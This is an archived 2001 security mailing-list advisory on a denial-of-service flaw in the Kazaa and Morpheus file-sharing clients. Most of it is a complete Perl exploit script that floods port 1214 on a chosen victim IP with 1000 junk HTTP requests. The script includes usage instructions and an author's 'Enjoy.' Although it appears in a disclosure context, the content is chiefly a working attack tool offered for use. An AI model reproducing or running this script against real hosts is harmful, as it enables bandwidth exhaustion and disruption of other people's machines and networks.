[EXPL] Kazaa / Morpheus Denial of Service Attack (Flood)
From: support@securiteam.comDate: 09/16/01
- Previous message: support@securiteam.com: "[UNIX] Apache UserDir Information Disclosure (User Anna)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] Kazaa / Morpheus Denial of Service Attack (Flood) Message-Id: <20010916154708.0F91D138BF@mail.der-keiler.de> Date: Sun, 16 Sep 2001 17:47:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Kazaa / Morpheus Denial of Service Attack (Flood)
------------------------------------------------------------------------
SUMMARY
A flaw in the way Kazaa / Morpheus handles incoming requests allows
attackers to consume all available bandwidth. Due to the way the program
works this attack will go un-logged.
DETAILS
Exploit:
#!/usr/bin/perl
#
#Kazaa/Morpheus Denial of Service Attack
#Coded by Paul Godfrey
#PaulG@Crackdealer.com
#
#Problem: Both Kazaa and Morpheus file sharing applications has a port
#which allow anonymous file access to their shared folder. What does this
have
#to do with Denial of Service? Unlike connections made from other users
#of the applications, the number of connections to the port cannot be
#regulated or detected by the client. This obviously will allow us to
flood the
#server with requests and therefore use up all of the available bandwidth.
#Also due to the fact that most users have setup their firewall privileges
so
#that Kazaa or Morpheus is allowed access to open connections to outside
sources
#this attack will bypass most personal firewall clients such as Zone
Alarm.
#
#Enjoy.
#
#Usage: ./km.pl -h victimip
use Socket;
use Getopt::Std;
getopts("h:", \%args);
print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }
$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't
exist?");
$trash="A"x100;
&exec_cmd($command);
sub exec_cmd {
for($count=1;$count<=1000;$count++)
{
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
print("|");
}
print("\nData Sent.\n\n");
}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,1214,$target)){
my @in;
select(S); $|=1; print $pstr;
while(< S >){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:PaulG@Crackdealer.com> Paul
Godfrey.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Apache UserDir Information Disclosure (User Anna)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
